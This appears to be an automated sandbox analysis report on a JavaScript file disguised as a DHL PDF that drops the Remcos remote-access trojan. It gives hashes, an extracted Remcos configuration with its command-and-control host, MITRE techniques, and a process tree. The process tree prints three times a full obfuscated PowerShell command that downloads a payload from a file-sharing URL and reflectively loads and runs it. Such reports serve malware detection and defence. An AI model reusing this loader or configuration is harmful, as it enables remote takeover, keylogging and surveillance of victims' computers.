Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/02/2025, 17:06

General

  • Target

    DHL RPA GRBP Template.PDF.js

  • Size

    84KB

  • MD5

    27cb47b5e1ac316a34e346dc787782f6

  • SHA1

    70d3f484ab6ca95c0d03479894181a4fbb883583

  • SHA256

    abc914c82dac8f803df0ae50a350c38cd7af60344f60936a6df01198efbb03f6

  • SHA512

    1ecf1ed09e1df85fa7596d0ca169885d2f19a43d98c8309ad2d9a039c5c8489932410ed8af47d1dbfbeb421b97b6515afd722c7785eac6249f37e0f88c3f6b8f

  • SSDEEP

    384:HZB5abMZB5abtZB5abdZB5abvZB5abtZB5abdZB5abhZB5abtZB5abdZB5abTZBH:4

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d

exe.dropper

https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d

Extracted

Family

remcos

Botnet

nom

C2

meme.linkpc.net:3174

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    vlc

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    ios

  • mouse_option

    false

  • mutex

    gig-G7MMFK

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    sos

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 6 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\DHL RPA GRBP Template.PDF.js"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2624
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1308
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\marly.js"
        3⤵
          PID:3732
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:4496
    • C:\Windows\system32\wscript.exe
      wscript.exe C:\ProgramData\marly.js
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1488
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))"
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1484
    • C:\Windows\system32\wscript.exe
      wscript.exe C:\ProgramData\marly.js
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2420
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))"
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1680

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\ios\logs.dat

      Filesize

      144B

      MD5

      ae5b84c8f7ba2885d978580f5f041d23

      SHA1

      bd2cf6c9fac762e832426e3c97b3fb37d8fa9add

      SHA256

      6ec1dcd138cfe8f888369f67523e6b868077af55edd67b40bd0fd5392c3b2187

      SHA512

      e80ebc79ee6ae0d96b9e6f08b2072166a9aec061e028d9d7bb8117890f56e8f5bad384ae8073eb4debdf32140de7a95eb20343d88f4b38c898f3fc8e34e678d3

    • C:\ProgramData\marly.js

      Filesize

      84KB

      MD5

      10c22df8d52720e2cb19f253a4f3815f

      SHA1

      c8413a63a19ec2a07fc053d6f94823c1cd48e787

      SHA256

      96a2d3b3da47cbe8a18c78592f79e3c03c889f1912a216fe60c1bed7ea7fb467

      SHA512

      a7790eaed0bb07c153a3b839acad08088578932e3d4fe9c6c9e36802ff5f29ad8fcf1fb093200bf8f861ac19699018455e83e476a88fbc6bdac9470599da474a

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ABCW1OJQ\FsssIAil[1].txt

      Filesize

      3KB

      MD5

      421bb5fd77561c2b135314692ee10dfe

      SHA1

      e45f048e3e3724306132df298205a5cc446cb2e5

      SHA256

      066fcbaff4d7fa16cf982d563ea85c1afcf324033ee4539c46998b49c067a6a0

      SHA512

      5f421b8f1122eaea36a4308453d280f6ecaba3af39ba8c9132d54e2e9519c49f211a9be17a3b2767177ddd665cfc6fff8ce835cf055102b6d38517a0b6e1c40a

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      7d5d8cf9f65ce79e552409c240295219

      SHA1

      ec5e938110638dcd176ce0645682a0d3949dd5a8

      SHA256

      817d6bfa16b959aae0dec64568ec6d98fdd61a205c61dde60551e192e5478596

      SHA512

      0d06c42b9c5648311000eefe9bd5a952dafd999b5c7ab17dbbebb6c6d9cd4b1de451e13ef0af72dfa3557aee8cb8bb5521642db843c3f61dfd701dd6c95afb68

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gtq0o2ar.5ik.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1308-5-0x000002449BF90000-0x000002449BFB2000-memory.dmp

      Filesize

      136KB

    • memory/1308-15-0x00007FF92EB60000-0x00007FF92F621000-memory.dmp

      Filesize

      10.8MB

    • memory/1308-16-0x00007FF92EB60000-0x00007FF92F621000-memory.dmp

      Filesize

      10.8MB

    • memory/1308-17-0x000002449D000000-0x000002449D206000-memory.dmp

      Filesize

      2.0MB

    • memory/1308-18-0x000002449BFE0000-0x000002449BFEC000-memory.dmp

      Filesize

      48KB

    • memory/1308-4-0x00007FF92EB63000-0x00007FF92EB65000-memory.dmp

      Filesize

      8KB

    • memory/1308-23-0x00007FF92EB60000-0x00007FF92F621000-memory.dmp

      Filesize

      10.8MB

    • memory/4496-20-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4496-27-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4496-30-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4496-31-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4496-28-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4496-41-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4496-40-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4496-29-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4496-24-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4496-22-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4496-60-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4496-61-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4496-68-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4496-69-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4496-85-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4496-86-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB